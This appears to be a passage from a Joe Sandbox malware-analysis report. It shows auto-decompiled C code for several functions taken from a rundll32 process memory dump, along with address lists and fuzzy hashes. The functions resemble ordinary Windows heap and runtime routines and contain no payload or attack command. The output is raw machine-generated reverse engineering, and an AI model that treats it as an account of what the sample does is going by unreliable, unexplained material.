							return E0444B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0444F380(_t67 + 0xc, 0x43e5138, 0x10) == 0) {
								 *0x44f60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04434F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04434E70(0x44f86b0, 0x4435690, 0, 0) != 0) {
					_t46 = E0440CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                0x04434d3b
                                                                                                                0x04434d4d
                                                                                                                0x04434d53
                                                                                                                0x04434d58
                                                                                                                0x04434d65
                                                                                                                0x04434d6c
                                                                                                                0x04434d71
                                                                                                                0x04434d77
                                                                                                                0x04434d7f
                                                                                                                0x04434d8c
                                                                                                                0x04434d8e
                                                                                                                0x04434dad
                                                                                                                0x04434db0
                                                                                                                0x04434db7
                                                                                                                0x04434db8
                                                                                                                0x04434db9
                                                                                                                0x04434dba
                                                                                                                0x04434dbb
                                                                                                                0x04434dc1
                                                                                                                0x04434dc8
                                                                                                                0x04434dcc
                                                                                                                0x04434dd5
                                                                                                                0x04434dde
                                                                                                                0x04434ddf
                                                                                                                0x04434de0
                                                                                                                0x04434de1
                                                                                                                0x04434de6
                                                                                                                0x04434de7
                                                                                                                0x04434de9
                                                                                                                0x04434df3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476c7c
                                                                                                                0x04476c8a
                                                                                                                0x04476c8a
                                                                                                                0x04476c9d
                                                                                                                0x04476ca7
                                                                                                                0x04476cac
                                                                                                                0x04476cb2
                                                                                                                0x04476cb9
                                                                                                                0x00000000
                                                                                                                0x04476cbf
                                                                                                                0x04476cbf
                                                                                                                0x00000000
                                                                                                                0x04476cbf
                                                                                                                0x04476cb9
                                                                                                                0x04434dfb
                                                                                                                0x04476ccf
                                                                                                                0x04476cd3
                                                                                                                0x04434e32
                                                                                                                0x04434e39
                                                                                                                0x04476ce0
                                                                                                                0x04476cf2
                                                                                                                0x04476cf2
                                                                                                                0x04476ce0
                                                                                                                0x04434e3f
                                                                                                                0x04434e41
                                                                                                                0x04434e51
                                                                                                                0x04434e51
                                                                                                                0x04434e03
                                                                                                                0x04434e03
                                                                                                                0x04434e09
                                                                                                                0x04434e0f
                                                                                                                0x04434e57
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04434e1b
                                                                                                                0x04434e30
                                                                                                                0x04434e5b
                                                                                                                0x04434e5b
                                                                                                                0x00000000
                                                                                                                0x04434e30
                                                                                                                0x04434e11
                                                                                                                0x04434e11
                                                                                                                0x04434e16
                                                                                                                0x00000000
                                                                                                                0x04434e16
                                                                                                                0x04434e01
                                                                                                                0x00000000
                                                                                                                0x04434e01
                                                                                                                0x04434da5
                                                                                                                0x04476c6b
                                                                                                                0x00000000
                                                                                                                0x04434dab
                                                                                                                0x04434dab
                                                                                                                0x00000000
                                                                                                                0x04434dab

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67097470e51a3b81c999bb962990579c18b8bb57cc82e7064b9428b9c34c2d7a
                                                                                                                • Instruction ID: c9d1beb151a65288252da8d4d5ade7adecb0e418fd37bc10d751fac77d5a020d
                                                                                                                • Opcode Fuzzy Hash: 67097470e51a3b81c999bb962990579c18b8bb57cc82e7064b9428b9c34c2d7a
                                                                                                                • Instruction Fuzzy Hash: 5C41A071A40318AFFF21DF15CD81BABB7AAEB48B14F04409BE94997381DB74FD448A91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04434BAD Relevance: .1, Instructions: 131COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E04434BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x44fd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0440CC50(_t86);
					L11:
					return E0444B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x44f8504
				E04422280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0444FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0444B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04424620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0440CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x44f8504
								E0441FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04434F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                                                0x04434bad
                                                                                                                0x04434bbf
                                                                                                                0x04434bc2
                                                                                                                0x04434bc6
                                                                                                                0x04434bcd
                                                                                                                0x04434bd9
                                                                                                                0x044767fe
                                                                                                                0x04476800
                                                                                                                0x04434ccc
                                                                                                                0x04434ccd
                                                                                                                0x04434cb7
                                                                                                                0x04434cc9
                                                                                                                0x04434cc9
                                                                                                                0x04434bdf
                                                                                                                0x04434be5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04434beb
                                                                                                                0x04434bef
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04434bf5
                                                                                                                0x04434bf9
                                                                                                                0x04434c06
                                                                                                                0x04434c0b
                                                                                                                0x04434c17
                                                                                                                0x04434c1c
                                                                                                                0x04434c1f
                                                                                                                0x04434c25
                                                                                                                0x04434c33
                                                                                                                0x04434c3d
                                                                                                                0x04434c40
                                                                                                                0x04434c43
                                                                                                                0x04434c47
                                                                                                                0x04434c4d
                                                                                                                0x04434c53
                                                                                                                0x04434c54
                                                                                                                0x04434c55
                                                                                                                0x04434c56
                                                                                                                0x04434c5b
                                                                                                                0x04434c5c
                                                                                                                0x04434c63
                                                                                                                0x04434c6b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04476776
                                                                                                                0x04476784
                                                                                                                0x04476784
                                                                                                                0x0447679f
                                                                                                                0x044767a7
                                                                                                                0x044767af
                                                                                                                0x044767ce
                                                                                                                0x00000000
                                                                                                                0x044767b1
                                                                                                                0x044767b7
                                                                                                                0x044767b8
                                                                                                                0x044767c1
                                                                                                                0x044767d3
                                                                                                                0x044767d9
                                                                                                                0x044767dd
                                                                                                                0x04434c94
                                                                                                                0x04434c94
                                                                                                                0x04434c98
                                                                                                                0x04434c9c
                                                                                                                0x04434ca3
                                                                                                                0x044767f4
                                                                                                                0x044767f4
                                                                                                                0x04434cb5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04434cb5
                                                                                                                0x04434c79
                                                                                                                0x04434c7e
                                                                                                                0x04434c89
                                                                                                                0x04434c8b
                                                                                                                0x04434c8f
                                                                                                                0x04434c8f
                                                                                                                0x00000000
                                                                                                                0x04434c89
                                                                                                                0x044767c3
                                                                                                                0x00000000
                                                                                                                0x044767c3
                                                                                                                0x044767af
                                                                                                                0x04434c73
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e057e07dbf8d828664dc892ac52f455d33db3aeefa1ffd7b59f9a46d702b402
                                                                                                                • Instruction ID: 05f482c653e63f317b17c93ff72b2217c67d251a4095b697b4872bab2ce7904d
                                                                                                                • Opcode Fuzzy Hash: 1e057e07dbf8d828664dc892ac52f455d33db3aeefa1ffd7b59f9a46d702b402
                                                                                                                • Instruction Fuzzy Hash: BB41A631A006289BDF20DF64C940BEA77B5EF49B50F0201ABE908AB341D774FE85CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04418A0A Relevance: .1, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E04418A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x44fd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0444B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0441E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x43e1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04431DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04443C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04418999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                                                0x04418a0a
                                                                                                                0x04418a1c
                                                                                                                0x04418a23
                                                                                                                0x04418a2e
                                                                                                                0x04418a30
                                                                                                                0x04418a36
                                                                                                                0x04418a3c
                                                                                                                0x04418a3e
                                                                                                                0x04418a4a
                                                                                                                0x04418a52
                                                                                                                0x04418a9c
                                                                                                                0x04418aae
                                                                                                                0x04418a58
                                                                                                                0x04418a5e
                                                                                                                0x04418a6a
                                                                                                                0x04418a6f
                                                                                                                0x04418a75
                                                                                                                0x04418a7d
                                                                                                                0x04418a85
                                                                                                                0x04418a86
                                                                                                                0x04418a89
                                                                                                                0x04418a93
                                                                                                                0x04418a99
                                                                                                                0x04418a9b
                                                                                                                0x00000000
                                                                                                                0x04418aaf
                                                                                                                0x04418abe
                                                                                                                0x04418ac3
                                                                                                                0x04418acb
                                                                                                                0x04418ad7
                                                                                                                0x04418ae0
                                                                                                                0x04418af1
                                                                                                                0x00000000
                                                                                                                0x04418af1
                                                                                                                0x04418acd
                                                                                                                0x04418ad5
                                                                                                                0x04418afb
                                                                                                                0x04418afd
                                                                                                                0x04418aff
                                                                                                                0x04418b07
                                                                                                                0x04418b22
                                                                                                                0x04418b24
                                                                                                                0x04418b2a
                                                                                                                0x04418b2e
                                                                                                                0x04418b3f
                                                                                                                0x04418b78
                                                                                                                0x04418b41
                                                                                                                0x04418b52
                                                                                                                0x04418b54
                                                                                                                0x04418b5c
                                                                                                                0x04418b74
                                                                                                                0x04418b74
                                                                                                                0x04418b5c
                                                                                                                0x04418b3f
                                                                                                                0x04418b5e
                                                                                                                0x04418b61
                                                                                                                0x04418b64
                                                                                                                0x04418b64
                                                                                                                0x04418b6c
                                                                                                                0x04418b6c
                                                                                                                0x04418b11
                                                                                                                0x04469cd5
                                                                                                                0x04469cd5
                                                                                                                0x04418b17
                                                                                                                0x04418b1a
                                                                                                                0x04418b1a
                                                                                                                0x00000000
                                                                                                                0x04418ad5
                                                                                                                0x04418a89

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e8ab80d14c249657fdbfd2231b1a38da840984c9fae627361a841b7763a7c7a
                                                                                                                • Instruction ID: 005de7a964e075931cddb16edc59db8f9892f7379fbe1871e76454879f7213e0
                                                                                                                • Opcode Fuzzy Hash: 6e8ab80d14c249657fdbfd2231b1a38da840984c9fae627361a841b7763a7c7a
                                                                                                                • Instruction Fuzzy Hash: 784142B5A4022C9BDF24DF55C888AAAB7B4EF44340F1045EBE81997352E770AE81CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044CAA16 Relevance: .1, Instructions: 120COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E044CAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E044CABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E044CAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E044CAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E044ACB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L044277F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E04427D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E044C131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E044ACB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                                                0x044caa1f
                                                                                                                0x044caa21
                                                                                                                0x044caa23
                                                                                                                0x044caa2b
                                                                                                                0x044caa30
                                                                                                                0x044caa36
                                                                                                                0x044caa39
                                                                                                                0x044caa42
                                                                                                                0x044caa75
                                                                                                                0x044caa7a
                                                                                                                0x044caa7c
                                                                                                                0x044caa7c
                                                                                                                0x044caa88
                                                                                                                0x044caa8a
                                                                                                                0x044caa8f
                                                                                                                0x044cab02
                                                                                                                0x044cab04
                                                                                                                0x044caa99
                                                                                                                0x044caaa8
                                                                                                                0x044caaaf
                                                                                                                0x044caab3
                                                                                                                0x044caacc
                                                                                                                0x044caad1
                                                                                                                0x044caad6
                                                                                                                0x044caae0
                                                                                                                0x044caaf3
                                                                                                                0x044caaf9
                                                                                                                0x044caafe
                                                                                                                0x044caafe
                                                                                                                0x044caaf3
                                                                                                                0x044caad6
                                                                                                                0x044caab3
                                                                                                                0x044cab07
                                                                                                                0x044cab0a
                                                                                                                0x044cab11
                                                                                                                0x044cab23
                                                                                                                0x044cab13
                                                                                                                0x044cab1c
                                                                                                                0x044cab1c
                                                                                                                0x044cab2b
                                                                                                                0x044cab44
                                                                                                                0x044cab44
                                                                                                                0x044cab51
                                                                                                                0x044cab51
                                                                                                                0x044caa44
                                                                                                                0x044caa47
                                                                                                                0x044caa4c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044caa5a
                                                                                                                0x044caa64
                                                                                                                0x044caa72
                                                                                                                0x00000000
                                                                                                                0x044caa66
                                                                                                                0x044caa66
                                                                                                                0x044caa68
                                                                                                                0x044caa6a
                                                                                                                0x00000000
                                                                                                                0x044caa6a

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction ID: e9255becacdfa5e8980b84008929860e56fa057ae07433698d1c717f5c91b45f
                                                                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                                                                • Instruction Fuzzy Hash: 6531F579B001086BEF55CB65C845BBFFBAADF84314F09806FE905B7351EA74AD00C650
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044CFDE2 Relevance: .1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E044CFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E044CFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E044D0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04427D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E044C1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E044D2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E044CC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E044CDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04427D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E044CA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                                                                0x044cfde7
                                                                                                                0x044cfde8
                                                                                                                0x044cfdec
                                                                                                                0x044cfdee
                                                                                                                0x044cfdf5
                                                                                                                0x044cfdf7
                                                                                                                0x044cfdfc
                                                                                                                0x044cfe19
                                                                                                                0x044cfe22
                                                                                                                0x044cfe26
                                                                                                                0x044cfec6
                                                                                                                0x044cfecd
                                                                                                                0x044cfed5
                                                                                                                0x044cfee7
                                                                                                                0x044cfed7
                                                                                                                0x044cfee0
                                                                                                                0x044cfee0
                                                                                                                0x044cfeef
                                                                                                                0x044cff00
                                                                                                                0x044cff02
                                                                                                                0x044cff07
                                                                                                                0x044cff07
                                                                                                                0x00000000
                                                                                                                0x044cfeef
                                                                                                                0x044cfe33
                                                                                                                0x044cfe55
                                                                                                                0x044cfe59
                                                                                                                0x044cfe5b
                                                                                                                0x044cfe5e
                                                                                                                0x044cfe69
                                                                                                                0x044cfe6d
                                                                                                                0x044cfe6d
                                                                                                                0x044cfe69
                                                                                                                0x044cfe35
                                                                                                                0x044cfe41
                                                                                                                0x044cfe41
                                                                                                                0x044cfe79
                                                                                                                0x044cfe8b
                                                                                                                0x044cfe7b
                                                                                                                0x044cfe84
                                                                                                                0x044cfe84
                                                                                                                0x044cfe93
                                                                                                                0x00000000
                                                                                                                0x044cfea8
                                                                                                                0x044cfeba
                                                                                                                0x00000000
                                                                                                                0x044cfeba
                                                                                                                0x044cfdfe
                                                                                                                0x044cfe01
                                                                                                                0x044cfe02
                                                                                                                0x044cfe08
                                                                                                                0x044cff0c
                                                                                                                0x044cff14
                                                                                                                0x044cff14

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction ID: f9595bcff26d0c667121cd51396ca4600635a2f2edd0a0b47edf8694480aeaaf
                                                                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                                                                • Instruction Fuzzy Hash: BF31E73A300640AFEB619B69C854F6B7BA7EB85650F1C405FE9468B782DA78F845C720
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044CEA55 Relevance: .1, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E044CEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04422280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E044CE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0440F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0441FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E044CAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E044CBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E04427D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E044BFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0441FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E044CA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                                                                                                0x044cea55
                                                                                                                0x044cea66
                                                                                                                0x044cea68
                                                                                                                0x044cea6c
                                                                                                                0x044cea6f
                                                                                                                0x044cea72
                                                                                                                0x044cea75
                                                                                                                0x044cea7a
                                                                                                                0x044cea7a
                                                                                                                0x044cea7e
                                                                                                                0x044cea80
                                                                                                                0x044cea85
